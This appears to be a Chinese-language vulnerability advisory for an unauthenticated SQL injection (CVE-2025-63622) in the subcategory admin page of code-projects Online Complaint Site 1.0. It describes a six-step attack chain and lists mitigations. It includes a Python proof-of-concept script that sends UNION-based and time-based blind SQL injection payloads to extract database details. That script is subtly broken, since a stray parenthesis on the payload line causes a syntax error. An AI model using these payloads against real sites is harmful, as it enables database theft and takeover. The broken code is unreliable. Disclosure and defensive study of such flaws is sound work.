CVE-2025-63622: code-projects在线投诉系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-63622

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Complaint Site 1.0

漏洞概述

CVE-2025-63622是code-projects公司开发的在线投诉网站管理系统1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台的子类别管理功能中，具体位于/cms/admin/subcategory.php文件。攻击者可以通过构造恶意的category参数值，未经认证即可远程利用此漏洞注入任意SQL语句。成功利用此漏洞可能导致数据库敏感信息泄露，包括用户账户、密码哈希等机密数据，在某些配置下甚至可能实现远程代码执行。由于该漏洞的CVSS评分高达9.8分（满分10分），属于紧急严重级别，对互联网公开的系统构成重大威胁。建议受影响用户立即采取修复措施，防止遭到恶意利用。

技术细节

该SQL注入漏洞源于在线投诉系统对用户输入的category参数缺乏有效的输入验证和SQL语句预编译处理。在/cms/admin/subcategory.php文件中，程序直接将该参数值拼接到SQL查询语句中，形成如下形式的查询：SELECT * FROM subcategories WHERE category = '用户输入'。攻击者可以通过在category参数中注入SQL运算符和命令，例如使用单引号(')闭合原语句，并添加UNION SELECT或AND条件构造恶意查询。由于系统未使用参数化查询或ORM框架，所有用户输入都被当作可信数据处理，导致恶意SQL代码被执行。攻击者可以利用UNION注入获取数据库版本、当前用户、数据库名称等元信息，进一步通过盲注或时间盲注技术提取管理员账户凭据等敏感数据。攻击过程无需任何认证，可通过HTTP请求直接触发，攻击复杂度低，成功率极高。

攻击链分析

STEP 1

步骤1

识别目标：攻击者访问目标网站，确认使用code-projects Online Complaint Site 1.0系统

STEP 2

步骤2

定位漏洞点：访问/cms/admin/subcategory.php文件，寻找可利用的category参数

STEP 3

步骤3

构造注入payload：使用单引号闭合原SQL语句，注入UNION SELECT或布尔盲注语句

STEP 4

步骤4

提取数据库信息：通过UNION注入获取数据库版本、用户名、数据库名等元信息

STEP 5

步骤5

数据窃取：利用时间盲注或联合查询提取管理员账户、用户密码哈希等敏感数据

STEP 6

步骤6

权限提升：尝试通过SQL注入获取管理员后台访问权限，进一步控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63622 PoC - SQL Injection in Online Complaint Site 1.0
# Target: /cms/admin/subcategory.php
# Parameter: category

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in category parameter
    """
    # Prepare the malicious request
    params = {
        'category': payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.RequestException as e:
        return f"Error: {e}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_63622.py <target_url>")
        print("Example: python cve_2025_63622.py http://target.com/cms/admin/subcategory.php")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Payload to extract database version
    payload = "1' UNION SELECT NULL,version(),user(),database()-- -")
    
    print(f"[*] Testing SQL injection on: {target}")
    print(f"[*] Payload: {payload}")
    
    result = exploit_sqli(target, payload)
    print(f"[+] Response:\n{result}")
    
    # Blind time-based injection payload
    blind_payload = "1' AND SLEEP(5)-- -"
    print(f"\n[*] Testing blind injection with: {blind_payload}")
    result = exploit_sqli(target, blind_payload)
    print(f"[+] Response: {result[:200]}...")

if __name__ == "__main__":
    main()

影响范围

code-projects Online Complaint Site 1.0

防御指南

临时缓解措施

在生产环境中，可临时采取以下缓解措施：1）通过Web服务器配置（如Nginx、Apache）限制对/cms/admin/路径的直接访问，仅允许可信IP访问管理后台；2）启用ModSecurity等WAF规则，拦截包含SQL注入特征的请求；3）暂时关闭子类别管理功能，直到官方发布修复补丁；4）实施网络层访问控制，限制管理后台的暴露范围。建议同时监控Web服务器日志，排查是否存在异常的SQL注入探测行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63622
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63622
3 Details https://www.cvedetails.com/cve/CVE-2025-63622/
4 VulDB https://vuldb.com/cve/CVE-2025-63622
5 Link https://github.com/xmqaq/cve/issues/2
6 Link https://github.com/xmqaq/cve/issues/2